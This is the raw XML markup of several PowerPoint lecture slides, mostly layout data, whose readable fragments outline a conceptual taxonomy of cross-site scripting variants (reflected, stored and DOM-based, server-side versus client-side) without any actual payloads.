              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1122" name="Freihand 1121">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B1D15E-FFF3-4E75-BF93-AEC5107B75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95526" y="4567274"/>
                  <a:ext cx="2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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2650966" y="4399154"/>
                <a:ext cx="23760" cy="162720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1124" name="Freihand 1123">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6762C512-206F-4D3C-B492-383CFE784C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42326" y="4390514"/>
                  <a:ext cx="4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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2608486" y="4353074"/>
                <a:ext cx="157680" cy="121320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1125" name="Freihand 1124">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21920841-079A-43A4-B1D2-C9D521733A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99486" y="434407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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2763646" y="4449554"/>
                <a:ext cx="117000" cy="112680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1137" name="Freihand 1136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B61C035-7B14-4796-BCD8-8EE317D9B3D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4646" y="4440914"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2879926" y="4456394"/>
                <a:ext cx="66240" cy="122400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1138" name="Freihand 1137">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68018D7-2E85-4444-BA67-127B0B8A0B8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871286" y="4447394"/>
                  <a:ext cx="838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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2957686" y="4486994"/>
                <a:ext cx="81720" cy="72360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1139" name="Freihand 1138">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC5FCDF-7547-4555-AE8B-E4B016B96D8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48686" y="4478354"/>
                  <a:ext cx="9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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3014926" y="4475834"/>
                <a:ext cx="60480" cy="214560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1140" name="Freihand 1139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B17CE90-991B-40B2-803A-C6C2913A59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06286" y="4466834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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3147766" y="4351994"/>
                <a:ext cx="62280" cy="198360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1141" name="Freihand 1140">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1B7AB5-2650-4C5A-9689-9567005EBFE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38766" y="4342994"/>
                  <a:ext cx="79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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3229126" y="4448114"/>
                <a:ext cx="97200" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1142" name="Freihand 1141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EF9AF81-00F7-40BD-A11D-188CFC2EADA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20126" y="4439474"/>
                  <a:ext cx="114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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3364846" y="4448474"/>
                <a:ext cx="89640" cy="77760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1146" name="Freihand 1145">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26FC71DA-CE5D-4E93-9E80-AEF4320A3E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56206" y="4439474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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3473206" y="4437314"/>
                <a:ext cx="27720" cy="88560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1147" name="Freihand 1146">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9086DD50-37F3-4286-AFE8-0807BB2F1F7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4206" y="4428674"/>
                  <a:ext cx="4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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3558886" y="4434794"/>
                <a:ext cx="90720" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1148" name="Freihand 1147">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF273429-9844-4FA1-B732-1253CB3829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49886" y="4425794"/>
                  <a:ext cx="108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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3648166" y="4356314"/>
                <a:ext cx="35280" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1149" name="Freihand 1148">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB11835-0431-4CF8-A60B-8E7F492B76A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9166" y="4347314"/>
                  <a:ext cx="52920" cy="17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55" name="Gewitterblitz 1154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D101A79-6171-4747-A541-8749CBC47EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2655851" y="2564178"/>
            <a:ext cx="365778" cy="409320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6666C-8C90-4020-9E49-B10E4036D0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId264"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6591330" y="2660949"/>
            <a:ext cx="5355183" cy="40586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FF2E03-637A-4A2E-AF44-75FE0D9D0C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId265"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031182" y="3603312"/>
            <a:ext cx="4121191" cy="3004841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B041B2BA-6670-43F9-8074-670A614DC10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1111130" y="1417025"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="1233360"/>
          </a:xfrm>
        </p:grpSpPr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57AF1EE5-6A18-4F0D-96EE-B0CA81823AD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8" name="Freihand 167">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{543572EF-1CE0-445B-9006-3D882EAB41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69" name="Freihand 168">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFAE395A-C8C5-4E37-A0D7-DBA191865B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F1C770B7-4A6F-44CF-AFF5-3C8A0B52D889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D4574069-5116-453E-9CF6-32C4010BA4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65DC867E-5AD5-4AD1-80BA-7CA9BC6BA8F1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B79CD955-8FAA-4049-93A0-99F226A3742F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3B2B0316-D598-4FC7-AFCC-4CBB679AC64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839254FD-AC48-407E-8ECF-513B69F5F0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71DC9F95-DBDA-4B3F-85FA-70AAE644422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7BC6A12C-0A2C-4DEB-BA57-EC78F13138EE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67" name="Freihand 166">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E4B4A4-EA96-4DCD-8C4A-4042A4C7A93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7AC384E4-0B20-442F-9B3A-EBAA8BBEAB8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E281F031-32C1-43FA-A720-CE977FE3AA6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82FD8297-56A4-4591-9E9D-E8C94F9952D9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180D1113-0991-4892-A661-0D3EE656BB52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10A93A64-F3C2-427A-B850-E16B12698A0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3929D030-EE2A-4BD5-92EF-B9B710E1B41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873BEB6A-8B71-4664-A8BC-254BDA5B61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3472063-DA17-4E78-9371-509B8D805726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307FB5A5-4DEB-4E6D-A150-57C8E4413D2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2" name="Freihand 151">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51718F6F-163C-42BE-AB5B-441693FC641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A2646EB2-61D2-4019-94E1-9DDB9356907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00B25FD8-97C3-4E7A-9E97-610A91FDE05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09A16ECF-2D8B-4A0E-A4C1-33891E9A2583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AE9AB745-5822-4B3D-86C2-509564808A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B1882655-2054-4228-B526-7C5FF8AD960E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88E22A4D-9AD2-4A84-9290-E47DF94F977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uppieren 172">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4BB81E1-02C7-4702-8E53-F321649661E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5419465" y="1706825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EFE37D2B-3658-483A-8E70-7BD42245B749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BF602D25-1B0F-4996-B624-BE58C52D4996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4ACB0B8F-C7ED-4765-ACBD-CD19C126C11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A8607258-8867-43D9-82B5-99FE7D09061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C94B23ED-BA6D-439D-873C-0403575B724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7BD3A896-A3F6-4E72-9B4E-53B87AC0ED3D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7B88E786-E33C-4B85-9558-CE33414EADED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0B53B5C-A2B6-4A59-8AD5-C65ECACAB863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526DC4E2-CA56-4822-861F-BE76BF683CCD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83" name="Freihand 182">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88480F26-959C-4888-BDE3-8BE19210BD7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84" name="Freihand 183">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55998DFA-1378-4BF2-ACF4-8F2388F7C029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85" name="Freihand 184">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40A8B86-F128-4942-AE7C-897A830591F6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ABFB9311-7B1F-4C5D-A497-7A60E54F069D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A768CCEF-9CCF-47FF-B62B-366C170630F4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17BCB85-911A-4F7D-BE0A-C20F7776B79D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185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F78EE23-F081-43C1-8E3F-7890BC4EE623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775313" y="1778944"/>
            <a:ext cx="6641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both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require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flaw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in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server-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code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96615A-D77B-4534-B6D5-12294D36EEB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2270525" y="3586655"/>
            <a:ext cx="76509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think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of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scenario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happens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only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C37AFFD-9C71-450F-8E35-27E6D6CE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3" y="2991999"/>
            <a:ext cx="8198069" cy="272201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40FBE5-531E-4CCA-8151-2127580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12" y="258160"/>
            <a:ext cx="7729373" cy="2542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ABB386-7BF6-47C5-97F8-3D7C01FBD2A4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payload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still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needs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travel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and back... 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2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8CC6BE9-2E11-43CB-83A5-0CB80E5E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24" y="191815"/>
            <a:ext cx="7255751" cy="23895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40D6270-108C-4BD9-AE3D-6E39B01C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38" y="2866919"/>
            <a:ext cx="8660524" cy="28194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95B22B3-3EE9-41F5-8EF4-666BA0FE79DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210207" y="5905488"/>
            <a:ext cx="11771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client-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side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>only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82224" y="2810741"/>
            <a:ext cx="2576301" cy="1485240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX1" fmla="*/ 618312 w 2576301"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX2" fmla="*/ 1185098 w 2576301"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX3" fmla="*/ 1880700 w 2576301"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX4" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX5" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY5" fmla="*/ 480228 h 1485240"/>
              <a:gd name="connsiteX6" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY6" fmla="*/ 945603 h 1485240"/>
              <a:gd name="connsiteX7" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY7" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX8" fmla="*/ 1932226 w 2576301"/>
              <a:gd name="connsiteY8" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX9" fmla="*/ 1365440 w 2576301"/>
              <a:gd name="connsiteY9" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX10" fmla="*/ 721364 w 2576301"/>
              <a:gd name="connsiteY10" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY11" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY12" fmla="*/ 1005012 h 1485240"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY13" fmla="*/ 524785 h 1485240"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 14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6301" h="1485240" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="235628" y="21461"/>
                  <a:pt x="400278" y="1104"/>
                  <a:pt x="618312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="836346" y="-1104"/>
                  <a:pt x="992525" y="11530"/>
                  <a:pt x="1185098" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1377671" y="-11530"/>
                  <a:pt x="1568763" y="-29480"/>
                  <a:pt x="1880700" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2192637" y="29480"/>
                  <a:pt x="2392839" y="12338"/>
                  <a:pt x="2576301" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2569560" y="165589"/>
                  <a:pt x="2596125" y="348378"/>
                  <a:pt x="2576301" y="480228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2556477" y="612078"/>
                  <a:pt x="2566296" y="851789"/>
                  <a:pt x="2576301" y="945603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2586306" y="1039418"/>
                  <a:pt x="2563129" y="1316736"/>
                  <a:pt x="2576301" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2347790" y="1495086"/>
                  <a:pt x="2068161" y="1476030"/>
                  <a:pt x="1932226" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1796292" y="1494450"/>
                  <a:pt x="1640425" y="1477903"/>
                  <a:pt x="1365440" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1090455" y="1492577"/>
                  <a:pt x="952857" y="1477973"/>
                  <a:pt x="721364" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="489871" y="1492507"/>
                  <a:pt x="211889" y="1464035"/>
                  <a:pt x="0" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-9805" y="1327280"/>
                  <a:pt x="-23155" y="1111779"/>
                  <a:pt x="0" y="1005012"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23155" y="898245"/>
                  <a:pt x="22011" y="703191"/>
                  <a:pt x="0" y="524785"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-22011" y="346379"/>
                  <a:pt x="-1345" y="26074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8" name="Rechteck 517">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{977DAE93-9189-4111-817E-CB83B361DF7F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5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471A-F3A0-48B3-B701-C5935C6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DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS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7AECC-3FD7-4FEE-9E0C-BC03F8B7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Payload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client-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>side</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Purest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>“ form: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>fragment</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>http://&lt;domain&gt;#&lt;exploit&gt;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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&gt;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reaches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/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> „Client XSS“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29157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8DFF6-9ABA-4A58-BF3B-1F388E1B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+ Client XSS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D85DF-C13B-4C32-806C-68FF784C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74" y="1843521"/>
            <a:ext cx="4547400" cy="37957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54C46D-56AB-4CF5-BA9C-1BB727BF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1" y="1843521"/>
            <a:ext cx="7258213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2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319443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64973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4F77692-1E02-404F-9D01-6A7C8F77CE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865121" y="1554480"/>
            <a:ext cx="419862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6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5946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03073" y="4140293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7345680" y="1642110"/>
            <a:ext cx="4531010" cy="22745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6F1678-554D-4F61-8A35-A5DFE889886C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811780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608325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528298" y="4152900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6FBAC7F-16BB-43BB-B6E3-E4D9CDACECA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2887980" y="4152900"/>
            <a:ext cx="4175760" cy="2036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4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756830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951BA67-7CCC-4CB6-BC57-DBCFDBFB323D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7475220" y="4193062"/>
            <a:ext cx="4327897" cy="21107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5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4DD9397-F236-46DB-BC99-76B2C47C1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442907"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="388883" y="282303"/>
          <a:ext cx="11487807" cy="5849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125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454046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11380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XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>Variations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Serverside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Clientside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Flaw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264719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Reflected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(„Non-Persistent)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Payload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slips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victim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link</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t>( In </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>some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reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t> back)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>Client </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>application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embeds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r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>Browser </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>interprets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payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="de-AT" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>Classic DOM-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>based</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t> XSS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT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93208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(„Persistent“)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Server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response</a:t>
                      </a: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Classic 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XSS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/>
                        <a:t> Server XSS)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Attacker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inserts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malicious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User </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>browses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content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Client </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>application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embeds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Browser </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>interprets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payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="de-DE" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t> DOM-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>based</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t> XSS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t> Client 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ABF3C057-FE5C-4683-9E68-018B7C39D0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
